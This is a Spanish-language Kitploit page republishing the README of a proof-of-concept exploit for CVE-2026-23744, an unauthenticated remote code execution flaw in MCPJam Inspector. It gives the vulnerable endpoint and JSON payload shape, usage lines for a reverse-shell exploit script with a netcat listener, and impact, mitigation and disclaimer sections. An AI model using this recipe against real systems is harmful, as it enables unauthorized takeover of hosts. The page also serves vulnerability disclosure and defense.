Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2026-23744 — Exploit de prueba de concepto para CVE-2026-23744, un RCE no autenticado en MCPJam Inspector. Proporciona shell inversa y ejecución de comandos a través de un endpoint de API vulnerable. | Kitploit
Herramientas/GitHubGitHub/rohit-sundar/cve-2026-23744
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAprendizaje y EducaciónHerramienta de Acceso RemotoLabs y Práctica
GitHubrohit-sundar/cve-2026-23744

cve-2026-23744

Exploit de prueba de concepto para CVE-2026-23744, un RCE no autenticado en MCPJam Inspector. Proporciona shell inversa y ejecución de comandos a través de un endpoint de API vulnerable.

hace 2 mesesAún no revisado
Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-23744 – Ejecución Remota de Código (RCE) sin Autenticación en MCPJam Inspector

Descripción

  • Producto: MCPJam Inspector
  • Versiones afectadas: ≤ 1.4.2
  • Versión corregida: 1.4.3
  • Tipo: Ejecución Remota de Código (RCE) sin autenticación
  • Vector de ataque: Red
  • Autenticación requerida: No
  • Interacción del usuario requerida: No
  • CVSS v3.1: 9.8 (Crítico)

CVE-2026-23744 es una vulnerabilidad crítica de ejecución remota de código (RCE) sin autenticación que afecta a MCPJam Inspector ≤ 1.4.2. El problema surge porque Inspector expone un endpoint de administración (/api/mcp/connect) que acepta configuración de servidor MCP controlada por el usuario y puede desencadenar la ejecución de procesos sin una autenticación adecuada ni restricciones de seguridad. Las versiones afectadas escuchan en 0.0.0.0 (todas las interfaces) por defecto en lugar de localhost, lo que hace posible la explotación remota si el servicio es accesible desde la red.

Detalles técnicos

La vulnerabilidad está asociada con el siguiente endpoint:

root@kitploit:~
POST /api/mcp/connect

El endpoint acepta un objeto JSON que contiene una configuración de servidor, como:

root@kitploit:~
{
  "serverConfig": {
    "command": "<executable>",
    "args": ["<arguments>"],
    "env": {}
  },
  "serverId": "<identifier>"
}

Esta configuración proporcionada es utilizada luego por MCPJam Inspector para crear y gestionar un nuevo proceso de servidor MCP. Dado que el endpoint carece de autenticación y controles de seguridad suficientes, un atacante puede enviar definiciones arbitrarias de procesos que son ejecutadas por el servicio Inspector.

Fundamentalmente, la vulnerabilidad es un problema de Ausencia de Autenticación para Funciones Críticas (CWE-306) en el que la aplicación expone funcionalidad destinada a usuarios locales de confianza y la hace accesible a través de la red sin controles de seguridad adecuados.

Causa raíz

La vulnerabilidad surge de dos fallos de diseño:

  1. Acceso no autenticado a la gestión de procesos
  • La API permite a los usuarios definir cómo se inician los servidores MCP.
  • La funcionalidad crítica es accesible sin autenticación.
  • Los parámetros de proceso controlados por el usuario son confiados por la aplicación sin validación adicional.
  1. Exposición predeterminada insegura
  • MCPJam Inspector escucha en 0.0.0.0 por defecto.
  • La API de administración es accesible desde otros sistemas de la red.
  • Los atacantes pueden interactuar de forma remota directamente con la funcionalidad de creación de procesos.

La ruta de ataque resultante se puede visualizar de la siguiente manera:

root@kitploit:~
Attacker → /api/mcp/connect → Process Creation → Operating System

Dado que la aplicación interactúa directamente con la creación de procesos del sistema operativo, una explotación exitosa puede resultar en la ejecución arbitraria de comandos dentro del contexto de seguridad del servicio MCPJam Inspector.

Uso

root@kitploit:~
python3 exploit.py -t <target_url> -tport <target_port> -lhost <local_ip> -lport <port>
  • -t (o) --target: URL objetivo o dirección IP objetivo.
  • -tport (o) --target-port: Puerto objetivo al que conectarse; en la mayoría de los casos es 6274 para MCPJam Inspector. No use este argumento si MCPJam Inspector está alojado en otro lugar, como en un subdominio o un host virtual. En su lugar, use el argumento -t para especificar el subdominio o el host virtual.
  • -lhost (o) --local-host: Dirección IP pública para que la reverse shell se conecte de vuelta.
  • -lport (o) --local-port: Puerto que se utilizará para la reverse shell.
root@kitploit:~
python3 exploit.py -t <target_url> -tport <target_port> -lhost <local_ip> -lport <port> -c '<command>'
  • -c (o) --command: Comando que se ejecutará en el objetivo.

Antes de usar este programa, primero debe iniciar un listener en su máquina local usando Netcat.

Para hacerlo, use el siguiente comando:

root@kitploit:~
nc -lvnp <port>

Luego, ejecute el comando anterior para obtener una reverse shell en el objetivo.

Impacto

Una explotación exitosa puede permitir a un atacante:

  • Ejecutar comandos arbitrarios en el host objetivo,
  • Leer o modificar archivos sensibles,
  • Instalar mecanismos de persistencia,
  • Desplegar malware o herramientas adicionales,
  • Moverse lateralmente a otros sistemas dentro del entorno,
  • Potencialmente lograr el compromiso total del sistema dependiendo de los privilegios del servicio.

A la vulnerabilidad se le ha asignado una puntuación CVSS v3.1 de 9.8 (Crítico) debido a su vector de ataque basado en red, la falta de autenticación, la ausencia de interacción del usuario y el alto impacto en la confidencialidad, integridad y disponibilidad.

Mitigación

Actualice inmediatamente a MCPJam Inspector 1.4.3 o posterior. Las medidas defensivas adicionales incluyen:

  • Restringir el acceso a la interfaz de Inspector,
  • Vincular los servicios a localhost siempre que sea posible,
  • Limitar la exposición mediante reglas de firewall,
  • Ejecutar el servicio con los privilegios mínimos necesarios,
  • Supervisar los intentos de acceso no autorizado.

Descargo de responsabilidad

Este PoC es únicamente para fines educativos, investigación defensiva de seguridad y pruebas de seguridad autorizadas. Solo debe utilizarse contra sistemas con permiso explícito. El uso no autorizado contra sistemas de terceros puede violar las leyes y regulaciones aplicables. El propietario de este repositorio no es responsable de ningún daño causado por el uso de este programa.

Fuentes

  1. Registro CVE de MITRE – CVE-2026-23744
  2. Base de Datos Nacional de Vulnerabilidades (NVD) de NIST – CVE-2026-23744
  3. Aviso de Seguridad de GitHub (GHSA-232v-j27c-5pp6)
  4. CVE-2026-23744 – Búsqueda de Vulnerabilidades
  5. CVE-2026-23744: RCE crítico en MCPJam Inspector dirigido a desarrolladores – CrowdSec
  6. CVE-2026-23744: Vulnerabilidad RCE en MCPJam Inspector – SentinelOne
Descargar herramienta